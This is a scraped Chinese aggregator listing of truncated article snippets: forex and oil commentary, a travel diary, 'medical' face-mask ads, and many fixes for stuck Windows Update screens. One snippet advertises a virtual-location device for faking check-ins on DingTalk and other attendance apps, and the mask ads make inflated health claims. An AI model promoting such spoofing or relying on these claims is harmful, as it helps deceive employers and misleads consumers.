    顶点&#xff08;Vertex&#xff09;&#xff1a;三维空间中的一个点&#xff0c;可以有多个属性&#xff0c;如位置坐标、颜色、纹理坐标和法线向量。它是构建三维几何形状的基本单元。 边&#xff08;Edge&#xff09;&#xff1a;连接两个顶点形成的直线段&#xff0c;它定…...

    2024/5/8 5:12:31
  4. 全自动封箱机的工作原理:科技与效率的完美结合

    随着科技的不断发展&#xff0c;越来越多的自动化设备走进了我们的日常生活和工业生产中。其中&#xff0c;全自动封箱机作为物流包装领域的重要一环&#xff0c;凭借其高效、精准的工作性能&#xff0c;正逐渐成为提升生产效率、降低劳动成本的得力助手。星派就来与大家深入探…...

    2024/5/5 19:18:37
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/8 6:01:22
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/7 9:45:25
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/9 4:20:59
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/7 11:36:39
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/6 1:40:42
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/8 20:48:49
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/7 9:26:26
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/8 19:33:07
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/5 8:13:33
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/8 20:38:49
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/6 21:42:42
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

    关机提示 windows7 正在配置windows 请勿关闭计算机 &#xff0c;然后等了一晚上也没有关掉。现在电脑无法正常关机以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;关机提示 windows7 正在配…...

    2022/11/19 21:17:05
  36. 钉钉提示请勿通过开发者调试模式_钉钉请勿通过开发者调试模式是真的吗好不好用...

    钉钉请勿通过开发者调试模式是真的吗好不好用 更新时间:2020-04-20 22:24:19 浏览次数:729次 区域: 南阳 > 卧龙 列举网提醒您:为保障您的权益,请不要提前支付任何费用! 虚拟位置外设器!!轨迹模拟&虚拟位置外设神器 专业用于:钉钉,外勤365,红圈通,企业微信和…...

    2022/11/19 21:17:05
  37. 配置失败还原请勿关闭计算机怎么办,win7系统出现“配置windows update失败 还原更改 请勿关闭计算机”,长时间没反应,无法进入系统的解决方案...

    前几天班里有位学生电脑(windows 7系统)出问题了&#xff0c;具体表现是开机时一直停留在“配置windows update失败 还原更改 请勿关闭计算机”这个界面&#xff0c;长时间没反应&#xff0c;无法进入系统。这个问题原来帮其他同学也解决过&#xff0c;网上搜了不少资料&#x…...

    2022/11/19 21:17:04
  38. 一个电脑无法关闭计算机你应该怎么办,电脑显示“清理请勿关闭计算机”怎么办?...

    本文为你提供了3个有效解决电脑显示“清理请勿关闭计算机”问题的方法&#xff0c;并在最后教给你1种保护系统安全的好方法&#xff0c;一起来看看&#xff01;电脑出现“清理请勿关闭计算机”在Windows 7(SP1)和Windows Server 2008 R2 SP1中&#xff0c;添加了1个新功能在“磁…...

    2022/11/19 21:17:03
  39. 请勿关闭计算机还原更改要多久,电脑显示:配置windows更新失败,正在还原更改,请勿关闭计算机怎么办...

    许多用户在长期不使用电脑的时候&#xff0c;开启电脑发现电脑显示&#xff1a;配置windows更新失败&#xff0c;正在还原更改&#xff0c;请勿关闭计算机。。.这要怎么办呢&#xff1f;下面小编就带着大家一起看看吧&#xff01;如果能够正常进入系统&#xff0c;建议您暂时移…...

    2022/11/19 21:17:02
  40. 还原更改请勿关闭计算机 要多久,配置windows update失败 还原更改 请勿关闭计算机,电脑开机后一直显示以...

    配置windows update失败 还原更改 请勿关闭计算机&#xff0c;电脑开机后一直显示以以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容&#xff0c;让我们赶快一起来看一下吧&#xff01;配置windows update失败 还原更改 请勿关闭计算机&#x…...

    2022/11/19 21:17:01
  41. 电脑配置中请勿关闭计算机怎么办,准备配置windows请勿关闭计算机一直显示怎么办【图解】...

    不知道大家有没有遇到过这样的一个问题&#xff0c;就是我们的win7系统在关机的时候&#xff0c;总是喜欢显示“准备配置windows&#xff0c;请勿关机”这样的一个页面&#xff0c;没有什么大碍&#xff0c;但是如果一直等着的话就要两个小时甚至更久都关不了机&#xff0c;非常…...

    2022/11/19 21:17:00
  42. 正在准备配置请勿关闭计算机,正在准备配置windows请勿关闭计算机时间长了解决教程...

    当电脑出现正在准备配置windows请勿关闭计算机时&#xff0c;一般是您正对windows进行升级&#xff0c;但是这个要是长时间没有反应&#xff0c;我们不能再傻等下去了。可能是电脑出了别的问题了&#xff0c;来看看教程的说法。正在准备配置windows请勿关闭计算机时间长了方法一…...

    2022/11/19 21:16:59
  43. 配置失败还原请勿关闭计算机,配置Windows Update失败,还原更改请勿关闭计算机...

    我们使用电脑的过程中有时会遇到这种情况&#xff0c;当我们打开电脑之后&#xff0c;发现一直停留在一个界面&#xff1a;“配置Windows Update失败&#xff0c;还原更改请勿关闭计算机”&#xff0c;等了许久还是无法进入系统。如果我们遇到此类问题应该如何解决呢&#xff0…...

    2022/11/19 21:16:58
  44. 如何在iPhone上关闭“请勿打扰”

    Apple’s “Do Not Disturb While Driving” is a potentially lifesaving iPhone feature, but it doesn’t always turn on automatically at the appropriate time. For example, you might be a passenger in a moving car, but your iPhone may think you’re the one dri…...

    2022/11/19 21:16:57